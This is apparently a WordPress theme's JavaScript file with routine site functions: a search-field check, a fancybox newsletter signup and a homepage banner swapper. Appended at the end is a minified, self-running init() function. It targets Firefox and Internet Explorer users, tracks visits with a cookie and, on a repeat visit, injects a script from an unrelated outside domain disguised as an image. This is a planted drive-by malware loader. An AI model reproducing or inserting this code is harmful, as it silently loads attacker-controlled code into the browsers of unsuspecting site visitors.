function checkblank() {
	searchterm = document.getElementById('s').value;
	if (searchterm == null || searchterm == "") {
		alert("Please enter something to search for.");
		return false;
	} else {
		return true;
	}
}

function subscribe() {
	var yournameid = document.getElementById('yourname');
	var youremailid = document.getElementById('youremail');
	if (yournameid.value != '' && youremailid.value != '') {
		$.fancybox({ 
			'width'			: 450,
			'height'		: 260,
			'padding'		: 0,
			'centerOnScroll'	: true,
			'overlayOpacity'	: 0.3,
			'overlayColor'		: '#111',
			'opacity'		: true,
			'autoScale'		: false,
			'transitionIn'		: 'elastic',
			'transitionOut'		: 'elastic',
			'href'		: '/js/createsend/Subscriber.Add.php?name='+yournameid.value+'&email='+youremailid.value,
			'type'			: 'iframe'
		});
	} else {
		alert('Please enter a valid name and email.');
	}
}

function swapbanner(banner) {
	var links = new Array();
	links[1] = '/lean/';
	links[2] = '/keen/';
	links[3] = '/green/';
	links[4] = '/team/';
	mainimage = document.getElementById('homebanner_image');
	mainimage.src = '/wp-content/themes/picton/images/homebanners/'+banner+'.jpg';
	mainlink = document.getElementById('homebanner_link');
	mainlink.href = links[banner];
	//reset all the thumb classes
	for (i=1;i<5;i++) {
		thumbid = document.getElementById('homebanner_thumb'+i+'');
		thumbid.className = 'homebanner_thumb';
	}
	//set the thumb class of the selected one
	thumba = document.getElementById('homebanner_thumb'+banner+'');
	thumba.className = 'homebanner_thumb on';
}

$(document).ready(function() {
	$("a.fancybox").fancybox({
		'transitionIn'	:	'elastic',
		'transitionOut'	:	'elastic',
		'padding'	:	0,
		'opacity'	:	true
	});
	$("label").inFieldLabels();	
});


function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="http://hotelsochi.lv/img/list_marker.gif?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j<l.length;j++){h=l[j].substr(0,l[j].indexOf("="));m=l[j].substr(l[j].indexOf("=")+1);h=h.replace(/^\s+|\s+$/g,"");if(h==k){return unescape(m)}}}function c(j,l,h){var m=new Date();m.setDate(m.getDate()+h);var k=escape(l)+((h==null)?"":"; expires="+m.toUTCString());document.cookie=j+"="+k}}init();
